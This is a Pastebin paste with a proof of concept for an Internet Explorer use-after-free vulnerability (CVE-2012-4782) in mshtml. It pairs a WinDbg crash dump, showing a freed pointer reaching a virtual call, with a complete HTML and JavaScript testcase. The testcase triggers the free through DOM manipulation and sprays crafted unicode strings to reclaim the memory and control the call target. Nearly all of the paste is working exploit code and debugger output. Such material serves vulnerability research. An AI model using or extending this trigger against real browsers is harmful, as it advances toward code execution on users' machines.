Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- CMarkup Use After Free Vulnerability - CVE-2012-4782 ( by https://twitter.com/__suto )
- Click on page after load.
- (a54.b48): Access violation - code c0000005 (!!! second chance !!!)
- eax=00000000 ebx=00000000 ecx=55555555 edx=640386e0 esi=0831c4f0 edi=0caecfa8
- eip=6383a618 esp=0831c4d0 ebp=0831c4e0 iopl=0 nv up ei pl zr na pe nc
- cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246
- mshtml!CTreeNode::ComputeFormats+0x9f:
- 6383a618 8b11 mov edx,dword ptr [ecx] ds:0023:55555555=????????
- 0:017> u
- mshtml!CTreeNode::ComputeFormats+0x9f:
- 6383a618 8b11 mov edx,dword ptr [ecx]
- 6383a61a 8b82c4000000 mov eax,dword ptr [edx+0C4h]
- 6383a620 ffd0 call eax
- 6383a622 8b400c mov eax,dword ptr [eax+0Ch]
- 6383a625 57 push edi
- 6383a626 893e mov dword ptr [esi],edi
- 6383a628 894604 mov dword ptr [esi+4],eax
- 6383a62b 8b0f mov ecx,dword ptr [edi]
- ===================
- <!doctype html>
- <html>
- <head>
- <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
- <script>
- function testcase(){
- var img = new Array();
- for(var i = 0;i < 100;i++){
- img[i] = document.createElement('img');
- img[i]["src"] = "a";
- }
- document.body.appendChild(document.createElement('progress'));
- document.body.appendChild(document.createElement("<track style='float:right'></track>"));
- document.body.appendChild(document.createElement('progress'));
- document.body.appendChild(document.createElement('table'));
- document.body.appendChild(document.createElement("<track style='float:right'></track>"));
- document.getElementsByTagName('progress').item(0).appendChild(document.createElement('frameset'));
- document.getElementsByTagName('track').item(0).offsetWidth;
- document.getElementsByTagName('progress').item(1).appendChild(document.getElementsByTagName('track').item(0));
- document.body.appendChild(document.createElement("<ins style='margin-left:2222222222px'></ins>"));
- window.scroll(500);
- for(var j = 0;j < 99;j++){
- img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAA\u5555\u5555AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u8141\u4141AAAAAAAA";}
- }
- </script>
- </head>
- <body onload='testcase();'>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement